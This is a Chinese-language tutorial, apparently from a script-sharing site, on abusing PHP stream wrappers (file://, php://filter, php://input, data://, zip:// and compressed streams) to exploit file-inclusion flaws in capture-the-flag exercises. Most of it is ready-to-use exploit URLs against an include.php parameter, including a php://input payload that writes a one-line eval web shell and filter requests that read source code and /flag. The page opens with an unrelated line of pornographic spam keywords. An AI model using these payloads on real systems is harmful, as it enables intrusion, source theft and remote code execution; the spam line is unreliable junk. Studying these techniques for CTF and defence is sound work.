亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

php偽協(xié)議實(shí)現(xiàn)命令執(zhí)行詳情

 更新時(shí)間:2022年06月10日 16:03:57   作者:jcxj2934  
這篇文章主要介紹了php偽協(xié)議實(shí)現(xiàn)命令執(zhí)行詳情,文章圍繞主題展開詳細(xì)的內(nèi)容介紹,感興趣的朋友可以參考一下

1.file://協(xié)議

條件:

allow_url_fopen : off/on
allow_url_include: off/on

作用:

用于訪問(wèn)本地文件系統(tǒng),在ctf中通常用來(lái)讀取本地文件

include() / require() / include_once() / require_once() 參數(shù)可控的情況下,即使導(dǎo)入非.php文件,如shell.txt ,依然按照php語(yǔ)法進(jìn)行解析,這是include()函數(shù)所決定的

說(shuō)明:

file:// 文件系統(tǒng)是php使用的默認(rèn)封裝協(xié)議,用于展示本地文件系統(tǒng)。

用法:

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext

示例:

1.file://[文件的絕對(duì)路徑和文件名]

http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

2.file://[文件的相對(duì)路徑和文件名]

http://127.0.0.1/include.php?file=./phpinfo.txt

3.http://網(wǎng)絡(luò)位置和文件名

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

2.php://協(xié)議

條件:

allow_url_open : off/on
allow_url_include: 僅 php://input ?php://stdin php://memory php://temp 需要on

作用:

php:// 訪問(wèn)各個(gè)輸入/輸出流 (I/O streams), 在ctf中經(jīng)常使用的是 php://filter 和 php://input

php://filter 用于讀取源碼
php://input 用于執(zhí)行php代碼

說(shuō)明:

php提供了一些雜項(xiàng)輸入/輸出(IO)流,允許訪問(wèn) PHP 的輸入輸出流,標(biāo)準(zhǔn)輸入輸出流和錯(cuò)誤描述符:

php://filter使用:

php://filter/read=convert.base64-encode/resource=[文件名]

php://input的使用:

http://127.0.0.1/include.php?file=php://input
?[POST DATA部分]
<?php phpinfo(); ?>

寫入一句話

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

3.data://協(xié)議

作用:

php>=5.2.0 , 可以使用data://數(shù)據(jù)流封裝器,以傳遞相應(yīng)格式的數(shù)據(jù)。通常用來(lái)執(zhí)行php代碼

用法:

data://text/plain, ???

如:

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

4.zip:// & bzip:// & zlib:// 協(xié)議

作用:

zip:// & bzip:// & zlib:// 均屬于壓縮流,可以訪問(wèn)壓縮文件中的子文件,更重要的是不需要指定后綴名,可以修改為任意后綴名,如 jpg,png,gif,xxx等

示例:

1.zip://[壓縮文件絕對(duì)路徑]%23[壓縮文件內(nèi)的子文件文件名](# 的編碼為 %23)

壓縮 phpinfo.txt 為phpinfo.zip ,壓縮包重命名為 phpinfo.jpg ,并上傳

http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2.compress.bzip2://file.bz2

壓縮phpinfo.txt 為phpinfo.bz2 并上傳(同樣支持任意后綴名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

3.compress.zlib://file.gz

壓縮phpinfo.txt 為phpinfo.gz 并上傳(支持任意后綴名)

http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

總結(jié)

在ctf中常用的有data:// , php://input , php://filter ,file://

php://input ,data://用來(lái)執(zhí)行命令
1.php://input 的用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
2.data://用法
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter,file://用來(lái)讀取文件
3.php://filter用法
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(讀取php文件需要先加密以下才能讀出來(lái))
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file://用法
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

到此這篇關(guān)于php偽協(xié)議實(shí)現(xiàn)命令執(zhí)行詳情的文章就介紹到這了,更多相關(guān)php命令執(zhí)行內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:

相關(guān)文章

最新評(píng)論